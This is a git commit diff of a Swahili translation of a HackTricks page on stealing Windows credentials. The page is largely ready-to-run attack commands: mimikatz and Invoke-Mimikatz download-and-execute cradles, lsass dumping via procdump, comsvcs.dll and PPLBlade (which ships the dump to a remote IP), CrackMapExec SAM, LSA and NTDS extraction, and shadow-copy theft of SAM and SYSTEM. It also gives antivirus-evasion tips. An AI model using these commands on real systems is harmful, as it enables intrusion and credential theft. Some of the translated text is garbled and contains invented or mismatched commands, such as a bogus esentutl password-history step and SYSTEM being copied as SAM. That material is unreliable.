mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
Translated ['windows-hardening/stealing-credentials/README.md'] to sw
This commit is contained in:
Translator
parent
d02ba56d2e
commit
752678aacf
1 changed files with 146 additions and 137 deletions
|
|
@ -1,20 +1,20 @@
|
|||
# Kuiba Vitambulisho vya Windows
|
||||
# Kuiba Nenosiri za Windows
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa katika HackTricks** au **kupakua HackTricks katika PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**rasmi PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Kuiga Vitambulisho vya Mimikatz
|
||||
## Nenosiri Mimikatz
|
||||
```bash
|
||||
#Elevate Privileges to extract the credentials
|
||||
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
|
||||
|
|
@ -28,7 +28,7 @@ lsadump::sam
|
|||
#One liner
|
||||
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"
|
||||
```
|
||||
**Pata vitu vingine ambavyo Mimikatz inaweza kufanya** [**kwenye ukurasa huu**](credentials-mimikatz.md)**.**
|
||||
**Pata mambo mengine ambayo Mimikatz inaweza kufanya katika** [**ukurasa huu**](credentials-mimikatz.md)**.**
|
||||
|
||||
### Invoke-Mimikatz
|
||||
```bash
|
||||
|
|
@ -36,11 +36,11 @@ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercont
|
|||
Invoke-Mimikatz -DumpCreds #Dump creds from memory
|
||||
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'
|
||||
```
|
||||
[**Jifunze kuhusu ulinzi wa vibali kadhaa hapa.**](credentials-protections.md) **Ulinzi huu unaweza kuzuia Mimikatz kutoa baadhi ya vibali.**
|
||||
[**Jifunze kuhusu baadhi ya ulinzi wa nywila hapa.**](credentials-protections.md) **Ulinzi huu unaweza kuzuia Mimikatz kutoa baadhi ya nywila.**
|
||||
|
||||
## Vibali na Meterpreter
|
||||
## Nywila na Meterpreter
|
||||
|
||||
Tumia [**Programu-jalizi ya Vibali**](https://github.com/carlospolop/MSF-Credentials) **ambayo** nimeunda ili **kutafuta nywila na hashi** ndani ya mwathiriwa.
|
||||
Tumia [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **ambayo** nimeunda **kutafuta nywila na hashes** ndani ya mwathirika.
|
||||
```bash
|
||||
#Credentials from SAM
|
||||
post/windows/gather/smart_hashdump
|
||||
|
|
@ -57,12 +57,12 @@ mimikatz_command -f "sekurlsa::logonpasswords"
|
|||
mimikatz_command -f "lsadump::lsa /inject"
|
||||
mimikatz_command -f "lsadump::sam"
|
||||
```
|
||||
## Kuvuka AV
|
||||
## Bypassing AV
|
||||
|
||||
### Procdump + Mimikatz
|
||||
|
||||
Kwa kuwa **Procdump kutoka** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**ni chombo halali cha Microsoft**, hakigunduliwi na Defender.\
|
||||
Unaweza kutumia chombo hiki ku **dump mchakato wa lsass**, **kupakua dump** na **kuchimbua** **vitambulisho kwa kiwango cha ndani** kutoka kwenye dump.
|
||||
Unaweza kutumia chombo hiki **kudump mchakato wa lsass**, **kupakua dump** na **kutoa** **credentials ndani** kutoka kwenye dump.
|
||||
|
||||
{% code title="Dump lsass" %}
|
||||
```bash
|
||||
|
|
@ -72,7 +72,13 @@ C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
|||
net use Z: https://live.sysinternals.com
|
||||
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||
```
|
||||
{% code title="Chukua siri za kuingia kutoka kwenye kichujio" %}
|
||||
{% endcode %}
|
||||
|
||||
{% code title="Extract credentials from the dump" %}
|
||||
|
||||
{% endcode %}
|
||||
|
||||
{% code title="Extract credentials from the dump" %}
|
||||
```c
|
||||
//Load the dump
|
||||
mimikatz # sekurlsa::minidump lsass.dmp
|
||||
|
|
@ -81,164 +87,169 @@ mimikatz # sekurlsa::logonPasswords
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
Hii mchakato inafanywa kiotomatiki na [SprayKatz](https://github.com/aas-n/spraykatz): `./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24`
|
||||
Mchakato huu unafanywa kiotomatiki na [SprayKatz](https://github.com/aas-n/spraykatz): `./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24`
|
||||
|
||||
**Maelezo**: Baadhi ya **AV** inaweza **kugundua** kama **hatari** matumizi ya **procdump.exe kudump lsass.exe**, hii ni kwa sababu wanagundua neno **"procdump.exe" na "lsass.exe"**. Hivyo ni **siri zaidi** ku **pita** kama **hoja** PID ya lsass.exe kwa procdump **badala ya** jina la lsass.exe.
|
||||
**Kumbuka**: Baadhi ya **AV** zinaweza **kugundua** kama **malicious** matumizi ya **procdump.exe to dump lsass.exe**, hii ni kwa sababu wanagundua mfuatano wa maneno **"procdump.exe" na "lsass.exe"**. Kwa hiyo ni **stealthier** **kupitisha** kama **argument** **PID** ya lsass.exe kwa procdump **badala ya** jina **lsass.exe.**
|
||||
|
||||
### Kudump lsass na **comsvcs.dll**
|
||||
### Dumping lsass na **comsvcs.dll**
|
||||
|
||||
DLL iitwayo **comsvcs.dll** iliyo katika `C:\Windows\System32` inawajibika kwa **kudump kumbukumbu ya mchakato** katika tukio la ajali. DLL hii ina **kazi** iitwayo **`MiniDumpW`**, iliyoundwa kuitwa kwa kutumia `rundll32.exe`.\
|
||||
Ni haifai kutumia hoja mbili za kwanza, lakini ya tatu imegawanywa katika sehemu tatu. Kitambulisho cha mchakato kinachotakiwa kudump kinawakilisha sehemu ya kwanza, mahali pa faili ya dump inawakilisha ya pili, na sehemu ya tatu ni neno **full**. Hakuna chaguo mbadala zilizopo.\
|
||||
Baada ya kuchambua sehemu hizi tatu, DLL inahusika katika kuunda faili ya dump na kuhamisha kumbukumbu ya mchakato uliopewa katika faili hii.\
|
||||
Matumizi ya **comsvcs.dll** yanawezekana kwa kudump mchakato wa lsass, hivyo kuondoa haja ya kupakia na kutekeleza procdump. Njia hii imeelezewa kwa undani katika [https://en.hackndo.com/remote-lsass-dump-passwords/](https://en.hackndo.com/remote-lsass-dump-passwords).
|
||||
DLL inayoitwa **comsvcs.dll** inayopatikana katika `C:\Windows\System32` inahusika na **dumping process memory** wakati wa ajali. DLL hii inajumuisha **function** inayoitwa **`MiniDumpW`**, iliyoundwa kutumika kwa kutumia `rundll32.exe`.\
|
||||
Sio muhimu kutumia hoja mbili za kwanza, lakini ya tatu imegawanywa katika vipengele vitatu. Kitambulisho cha mchakato kinachopaswa kudump ni kipengele cha kwanza, eneo la faili la dump ni kipengele cha pili, na kipengele cha tatu ni neno **full**. Hakuna chaguo mbadala.\
|
||||
Baada ya kuchambua vipengele hivi vitatu, DLL inahusika na kuunda faili ya dump na kuhamisha kumbukumbu ya mchakato maalum kwenye faili hii.\
|
||||
Matumizi ya **comsvcs.dll** yanawezekana kwa kudump mchakato wa lsass, hivyo kuondoa haja ya kupakia na kutekeleza procdump. Njia hii imeelezewa kwa kina katika [https://en.hackndo.com/remote-lsass-dump-passwords/](https://en.hackndo.com/remote-lsass-dump-passwords).
|
||||
|
||||
Amri ifuatayo inatumika kwa utekelezaji:
|
||||
```bash
|
||||
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
|
||||
```
|
||||
**Unaweza kusindika hii taratibu kiotomatiki kwa kutumia** [**lssasy**](https://github.com/Hackndo/lsassy)**.**
|
||||
**Unaweza kuendesha mchakato huu kiotomatiki kwa kutumia** [**lssasy**](https://github.com/Hackndo/lsassy)**.**
|
||||
|
||||
### **Kuchota lsass kwa kutumia Task Manager**
|
||||
### **Kutoa lsass kwa kutumia Task Manager**
|
||||
|
||||
1. Bonyeza kulia kwenye Task Bar na bonyeza kwenye Task Manager
|
||||
2. Bonyeza kwenye More details
|
||||
1. Bonyeza kulia kwenye Task Bar na bonyeza Task Manager
|
||||
2. Bonyeza More details
|
||||
3. Tafuta mchakato wa "Local Security Authority Process" kwenye kichupo cha Processes
|
||||
4. Bonyeza kulia kwenye mchakato wa "Local Security Authority Process" na bonyeza "Create dump file".
|
||||
|
||||
### Kuchota lsass kwa kutumia procdump
|
||||
### Kutoa lsass kwa kutumia procdump
|
||||
|
||||
[Procdump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) ni faili iliyosainiwa na Microsoft ambayo ni sehemu ya [sysinternals](https://docs.microsoft.com/en-us/sysinternals/) suite.
|
||||
[Procdump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) ni binary iliyosainiwa na Microsoft ambayo ni sehemu ya [sysinternals](https://docs.microsoft.com/en-us/sysinternals/) suite.
|
||||
```
|
||||
Get-Process -Name LSASS
|
||||
.\procdump.exe -ma 608 lsass.dmp
|
||||
```
|
||||
## Kudondosha lsass na PPLBlade
|
||||
## Dumpin lsass with PPLBlade
|
||||
|
||||
[**PPLBlade**](https://github.com/tastypepperoni/PPLBlade) ni chombo cha Kudondosha Mchakato Uliolindwa kinachosaidia kuficha kumbukumbu ya kudondosha na kuhamisha kwenye vituo vya kazi vya mbali bila kuacha kwenye diski.
|
||||
[**PPLBlade**](https://github.com/tastypepperoni/PPLBlade) ni Chombo cha Kulinda Mchakato wa Kutoa Kumbukumbu ambacho kinaunga mkono kuficha dump ya kumbukumbu na kuhamisha kwenye vituo vya kazi vya mbali bila kuiweka kwenye diski.
|
||||
|
||||
**Vipengele muhimu**:
|
||||
**Uwezo Muhimu**:
|
||||
|
||||
1. Kupita kinga ya PPL
|
||||
2. Kuficha faili za kumbukumbu ya kudondosha ili kuepuka mbinu za kugundua saini za Defender
|
||||
3. Kupakia kumbukumbu ya kudondosha kwa njia za RAW na SMB bila kuacha kwenye diski (kudondosha bila faili)
|
||||
1. Kuepuka ulinzi wa PPL
|
||||
2. Kuficha faili za dump za kumbukumbu ili kuepuka mifumo ya kugundua ya Defender inayotegemea saini
|
||||
3. Kupakia dump ya kumbukumbu kwa mbinu za RAW na SMB bila kuiweka kwenye diski (fileless dump)
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
## CrackMapExec
|
||||
|
||||
### Dumpisha hashi za SAM
|
||||
### Dump SAM hashes
|
||||
|
||||
### Kutumia CrackMapExec kutoa SAM hashes
|
||||
|
||||
CrackMapExec ni zana yenye nguvu inayotumiwa na wataalamu wa usalama na wahalifu wa mtandao kwa shughuli mbalimbali za usalama. Moja ya matumizi yake ni kutoa SAM hashes kutoka kwa mifumo ya Windows. Hii inaweza kusaidia katika kutambua udhaifu wa usalama na kuchukua hatua zinazofaa.
|
||||
|
||||
```bash
|
||||
cme smb <target_ip> -u <username> -p <password> --sam
|
||||
```
|
||||
|
||||
Amri hii itatoa SAM hashes kutoka kwa mfumo lengwa. Ni muhimu kutumia zana hii kwa uwajibikaji na kwa madhumuni ya kisheria pekee.
|
||||
```
|
||||
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
|
||||
```
|
||||
### Pata Siri za LSA
|
||||
### Kutoa siri za LSA
|
||||
|
||||
**Description**: Siri za LSA ni habari muhimu za uwakilishi wa usalama katika mfumo wa Windows. Kwa kudump siri hizi, unaweza kupata nywila na habari nyingine muhimu za uwakilishi wa usalama.
|
||||
### Mimikatz
|
||||
|
||||
**Technique**: Kuna njia kadhaa za kudump siri za LSA:
|
||||
Mimikatz ni zana maarufu inayotumiwa na wavamizi na wataalamu wa usalama kutoa nywila na hati za uthibitisho kutoka kwa mifumo ya Windows. Inatumika sana katika pentesting na shughuli za uchunguzi wa usalama.
|
||||
|
||||
1. **LSA Secrets Dump**: Unaweza kutumia zana kama `lsadump` au `mimikatz` kudump siri za LSA kutoka kwa mfumo uliopo. Zana hizi zinaweza kuchambua na kutoa habari muhimu kama vile nywila za akaunti za mtumiaji na nywila za kuhifadhiwa kwa programu.
|
||||
```shell
|
||||
mimikatz # privilege::debug
|
||||
mimikatz # sekurlsa::logonpasswords
|
||||
```
|
||||
|
||||
2. **Registry**: Siri za LSA zinahifadhiwa katika rejista ya Windows. Unaweza kuchunguza na kudump siri hizi kwa kuchambua sehemu maalum za rejista kama vile `HKEY_LOCAL_MACHINE\Security\Policy\Secrets`.
|
||||
### Procdump
|
||||
|
||||
**Impact**: Kwa kudump siri za LSA, unaweza kupata ufikiaji usio halali kwa akaunti za mtumiaji na habari nyingine muhimu za uwakilishi wa usalama. Hii inaweza kusababisha uvunjaji wa usalama, upotezaji wa data, na uharibifu mwingine wa mfumo.
|
||||
Procdump ni zana ya Microsoft inayotumiwa kutoa faili za kumbukumbu za mchakato. Inaweza kutumika kutoa kumbukumbu za mchakato wa LSASS, ambazo zinaweza kuchambuliwa ili kupata nywila na hati za uthibitisho.
|
||||
|
||||
**Countermeasures**: Kuna hatua kadhaa za kuchukua ili kuzuia kudump siri za LSA:
|
||||
```shell
|
||||
procdump -ma lsass.exe lsass.dmp
|
||||
```
|
||||
|
||||
- Tumia sera kali za usalama kwenye mfumo wako ili kuzuia ufikiaji usio halali kwa siri za LSA.
|
||||
- Funga na sasisha programu zote zinazojulikana kama `lsadump` au `mimikatz` ili kuzuia matumizi yao mabaya.
|
||||
- Fanya ukaguzi wa mara kwa mara wa mfumo wako ili kugundua na kurekebisha mapungufu yoyote ya usalama yanayoweza kusababisha kudump siri za LSA.
|
||||
### Task Manager
|
||||
|
||||
**References**:
|
||||
- [https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dumping-lsass-credentials](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dumping-lsass-credentials)
|
||||
Unaweza pia kutumia Task Manager kutoa kumbukumbu za mchakato wa LSASS.
|
||||
|
||||
1. Fungua Task Manager.
|
||||
2. Tafuta mchakato wa `lsass.exe`.
|
||||
3. Bonyeza kulia na uchague `Create Dump File`.
|
||||
|
||||
### Out-Minidump.ps1
|
||||
|
||||
Out-Minidump.ps1 ni script ya PowerShell inayotumiwa kutoa kumbukumbu za mchakato wa LSASS.
|
||||
|
||||
```shell
|
||||
Out-Minidump -Name lsass -Path lsass.dmp
|
||||
```
|
||||
|
||||
### Invoke-Mimikatz
|
||||
|
||||
Invoke-Mimikatz ni moduli ya PowerShell inayotumiwa kuendesha Mimikatz moja kwa moja kutoka kwa PowerShell.
|
||||
|
||||
```shell
|
||||
Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"
|
||||
```
|
||||
|
||||
### CrackMapExec
|
||||
|
||||
CrackMapExec ni zana ya usalama inayotumiwa kufanya mashambulizi ya mtandao na kutoa hati za uthibitisho kutoka kwa mifumo ya Windows.
|
||||
|
||||
```shell
|
||||
crackmapexec smb <target_ip> -u <username> -p <password> --lsa
|
||||
```
|
||||
|
||||
### SecretsDump
|
||||
|
||||
SecretsDump ni zana ya Impacket inayotumiwa kutoa nywila na hati za uthibitisho kutoka kwa mifumo ya Windows.
|
||||
|
||||
```shell
|
||||
secretsdump.py <domain>/<username>@<target_ip>
|
||||
```
|
||||
```
|
||||
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
|
||||
```
|
||||
### Pata NTDS.dit kutoka kwa DC ya lengo
|
||||
|
||||
```bash
|
||||
# On the attacker machine
|
||||
impacket-secretsdump -just-dc-ntlm <target_DC_IP>
|
||||
```
|
||||
|
||||
Hii itakusaidia kupata faili ya NTDS.dit kutoka kwa DC ya lengo.
|
||||
### Kutoa NTDS.dit kutoka kwa DC lengwa
|
||||
```
|
||||
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
|
||||
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
|
||||
```
|
||||
### Pata historia ya nywila ya NTDS.dit kutoka kwa DC ya lengo
|
||||
|
||||
```plaintext
|
||||
To dump the NTDS.dit password history from a target Domain Controller (DC), you can use the following steps:
|
||||
|
||||
1. Gain administrative access to the target DC.
|
||||
2. Open a command prompt with administrative privileges.
|
||||
3. Navigate to the directory where the NTDS.dit file is located. The default path is `C:\Windows\NTDS`.
|
||||
4. Use the `ntdsutil` command to enter the NTDS utility.
|
||||
5. Within the NTDS utility, use the `activate instance ntds` command to activate the NTDS instance.
|
||||
6. Use the `ifm` command to create an Install From Media (IFM) snapshot of the NTDS database.
|
||||
7. Specify a directory where the IFM snapshot will be stored.
|
||||
8. Exit the NTDS utility by using the `quit` command.
|
||||
9. Navigate to the directory where the IFM snapshot is stored.
|
||||
10. Use the `esentutl` command to dump the password history from the NTDS.dit file. The command syntax is as follows:
|
||||
```
|
||||
esentutl /r <NTDS.dit> /l <log files path> /s <system files path> /d <destination path> /p "<password>"
|
||||
```
|
||||
- `<NTDS.dit>`: Path to the NTDS.dit file.
|
||||
- `<log files path>`: Path to the log files directory.
|
||||
- `<system files path>`: Path to the system files directory.
|
||||
- `<destination path>`: Path where the dumped password history will be saved.
|
||||
- `<password>`: Password for the NTDS database.
|
||||
11. Once the password history is dumped, you can analyze it to extract the desired credentials.
|
||||
|
||||
Note: Dumping the NTDS.dit file and accessing password history may be subject to legal restrictions and should only be performed with proper authorization and for legitimate purposes.
|
||||
```
|
||||
### Kutoa historia ya nywila ya NTDS.dit kutoka kwa DC lengwa
|
||||
```
|
||||
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
|
||||
```
|
||||
### Onyesha sifa ya pwdLastSet kwa kila akaunti ya NTDS.dit
|
||||
|
||||
Ili kuonyesha sifa ya pwdLastSet kwa kila akaunti ya NTDS.dit, unaweza kutumia zana ya PowerShell ifuatayo:
|
||||
|
||||
```powershell
|
||||
Get-ADUser -Filter * -Properties pwdLastSet | Select-Object Name, pwdLastSet
|
||||
```
|
||||
|
||||
Zana hii itakupa orodha ya akaunti zote za NTDS.dit pamoja na sifa ya pwdLastSet kwa kila akaunti.
|
||||
```
|
||||
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
|
||||
```
|
||||
## Kuiba SAM & SYSTEM
|
||||
|
||||
Faili hizi zinapaswa kuwa **zimehifadhiwa** katika _C:\windows\system32\config\SAM_ na _C:\windows\system32\config\SYSTEM._ Lakini **hauwezi tu kuzikopi kwa njia ya kawaida** kwa sababu zimekingwa.
|
||||
Hizi faili zinapaswa kuwa **zimewekwa** katika _C:\windows\system32\config\SAM_ na _C:\windows\system32\config\SYSTEM._ Lakini **huwezi tu kuzinakili kwa njia ya kawaida** kwa sababu zinalindwa.
|
||||
|
||||
### Kutoka kwenye Usajili (Registry)
|
||||
### Kutoka kwa Registry
|
||||
|
||||
Njia rahisi ya kuiba faili hizo ni kupata nakala kutoka kwenye usajili (registry):
|
||||
Njia rahisi ya kuiba faili hizo ni kupata nakala kutoka kwa registry:
|
||||
```
|
||||
reg save HKLM\sam sam
|
||||
reg save HKLM\system system
|
||||
reg save HKLM\security security
|
||||
```
|
||||
**Pakua** faili hizo kwenye kifaa chako cha Kali na **toanishe alama** kwa kutumia:
|
||||
**Pakua** faili hizo kwenye mashine yako ya Kali na **toa hashes** ukitumia:
|
||||
```
|
||||
samdump2 SYSTEM SAM
|
||||
impacket-secretsdump -sam sam -security security -system system LOCAL
|
||||
```
|
||||
### Kivuli ya Nakala
|
||||
### Volume Shadow Copy
|
||||
|
||||
Unaweza kufanya nakala ya faili zilizolindwa kwa kutumia huduma hii. Unahitaji kuwa Msimamizi.
|
||||
|
||||
#### Kutumia vssadmin
|
||||
|
||||
Faili ya vssadmin inapatikana tu kwenye toleo la Windows Server.
|
||||
vssadmin binary inapatikana tu katika matoleo ya Windows Server
|
||||
```bash
|
||||
vssadmin create shadow /for=C:
|
||||
#Copy SAM
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SAM
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SAM C:\Extracted\SAM
|
||||
#Copy SYSTEM
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
|
||||
#Copy ntds.dit
|
||||
|
|
@ -247,7 +258,7 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Ex
|
|||
# You can also create a symlink to the shadow copy and access it
|
||||
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
|
||||
```
|
||||
Lakini unaweza kufanya hivyo kutoka **Powershell**. Hii ni mfano wa **jinsi ya kunakili faili ya SAM** (diski ngumu inayotumiwa ni "C:" na imehifadhiwa kwenye C:\users\Public) lakini unaweza kutumia hii kunakili faili yoyote iliyolindwa:
|
||||
Lakini unaweza kufanya vivyo hivyo kutoka **Powershell**. Hii ni mfano wa **jinsi ya kunakili faili la SAM** (diski kuu inayotumika ni "C:" na imehifadhiwa kwenye C:\users\Public) lakini unaweza kutumia hii kunakili faili lolote lililolindwa:
|
||||
```bash
|
||||
$service=(Get-Service -name VSS)
|
||||
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
|
||||
|
|
@ -256,37 +267,35 @@ $volume=(gwmi win32_shadowcopy -filter "ID='$id'")
|
|||
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
|
||||
$voume.Delete();if($notrunning -eq 1){$service.Stop()}
|
||||
```
|
||||
Code kutoka kwenye kitabu: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)
|
||||
|
||||
### Invoke-NinjaCopy
|
||||
|
||||
Mwishowe, unaweza pia kutumia [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) kuunda nakala ya SAM, SYSTEM na ntds.dit.
|
||||
Hatimaye, unaweza pia kutumia [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) kufanya nakala ya SAM, SYSTEM na ntds.dit.
|
||||
```bash
|
||||
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
|
||||
```
|
||||
## **Active Directory Credentials - NTDS.dit**
|
||||
|
||||
Faili la **NTDS.dit** linajulikana kama moyo wa **Active Directory**, likiwa na data muhimu kuhusu vitu vya mtumiaji, vikundi, na uanachama wao. Hapo ndipo **hashi za nywila** za watumiaji wa kikoa zinahifadhiwa. Faili hili ni **database ya Extensible Storage Engine (ESE)** na lipo katika **_%SystemRoom%/NTDS/ntds.dit_**.
|
||||
**NTDS.dit** ni faili linalojulikana kama moyo wa **Active Directory**, likihifadhi data muhimu kuhusu vitu vya watumiaji, vikundi, na uanachama wao. Hapa ndipo **password hashes** za watumiaji wa domain zinapohifadhiwa. Faili hili ni **Extensible Storage Engine (ESE)** database na linapatikana kwenye **_%SystemRoom%/NTDS/ntds.dit_**.
|
||||
|
||||
Ndani ya database hii, kuna meza tatu kuu zinazosimamiwa:
|
||||
Ndani ya database hii, meza kuu tatu zinahifadhiwa:
|
||||
|
||||
- **Meza ya Data**: Meza hii inahusika na kuhifadhi maelezo kuhusu vitu kama watumiaji na vikundi.
|
||||
- **Meza ya Link**: Inasimamia uhusiano, kama vile uanachama wa vikundi.
|
||||
- **Meza ya SD**: **Maelezo ya usalama** kwa kila kipengee yanahifadhiwa hapa, ikidhibiti usalama na udhibiti wa ufikiaji kwa vitu vilivyohifadhiwa.
|
||||
- **Data Table**: Meza hii inahusika na kuhifadhi maelezo kuhusu vitu kama watumiaji na vikundi.
|
||||
- **Link Table**: Inafuatilia mahusiano, kama uanachama wa vikundi.
|
||||
- **SD Table**: **Security descriptors** kwa kila kitu zinahifadhiwa hapa, zikihakikisha usalama na udhibiti wa upatikanaji wa vitu vilivyohifadhiwa.
|
||||
|
||||
Maelezo zaidi kuhusu hili: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
|
||||
|
||||
Windows hutumia _Ntdsa.dll_ kuwasiliana na faili hiyo na hutumiwa na _lsass.exe_. Kwa hivyo, **sehemu** ya faili ya **NTDS.dit** inaweza kupatikana **ndani ya kumbukumbu ya `lsass`** (unaweza kupata data iliyotembelewa hivi karibuni labda kwa sababu ya kuboresha utendaji kwa kutumia **cache**).
|
||||
Windows inatumia _Ntdsa.dll_ kuingiliana na faili hilo na inatumika na _lsass.exe_. Kisha, **sehemu** ya faili **NTDS.dit** inaweza kupatikana **ndani ya `lsass`** memory (unaweza kupata data iliyofikiwa hivi karibuni labda kwa sababu ya kuboresha utendaji kwa kutumia **cache**).
|
||||
|
||||
#### Kufichua hashi ndani ya NTDS.dit
|
||||
#### Kufungua hashes ndani ya NTDS.dit
|
||||
|
||||
Hashi imefichwa mara 3:
|
||||
Hash inafunguliwa mara 3:
|
||||
|
||||
1. Fichua Funguo wa Kufichua Nywila (**PEK**) kwa kutumia **BOOTKEY** na **RC4**.
|
||||
2. Fichua **hashi** kwa kutumia **PEK** na **RC4**.
|
||||
3. Fichua **hashi** kwa kutumia **DES**.
|
||||
1. Fungua Password Encryption Key (**PEK**) kwa kutumia **BOOTKEY** na **RC4**.
|
||||
2. Fungua **hash** kwa kutumia **PEK** na **RC4**.
|
||||
3. Fungua **hash** kwa kutumia **DES**.
|
||||
|
||||
**PEK** ina **thamani ile ile** katika **kila kudhibiti kikoa**, lakini imefichwa ndani ya faili ya **NTDS.dit** kwa kutumia **BOOTKEY** ya **faili ya SYSTEM ya kudhibiti kikoa (inatofautiana kati ya kudhibiti kikoa)**. Ndio maana ili kupata vibali kutoka kwenye faili ya NTDS.dit **unahitaji faili za NTDS.dit na SYSTEM** (_C:\Windows\System32\config\SYSTEM_).
|
||||
**PEK** ina **thamani sawa** katika **kila domain controller**, lakini imefungwa ndani ya faili **NTDS.dit** kwa kutumia **BOOTKEY** ya **SYSTEM file ya domain controller (ni tofauti kati ya domain controllers)**. Hii ndiyo sababu ili kupata credentials kutoka faili la NTDS.dit **unahitaji faili za NTDS.dit na SYSTEM** (_C:\Windows\System32\config\SYSTEM_).
|
||||
|
||||
### Kunakili NTDS.dit kwa kutumia Ntdsutil
|
||||
|
||||
|
|
@ -294,52 +303,52 @@ Inapatikana tangu Windows Server 2008.
|
|||
```bash
|
||||
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
|
||||
```
|
||||
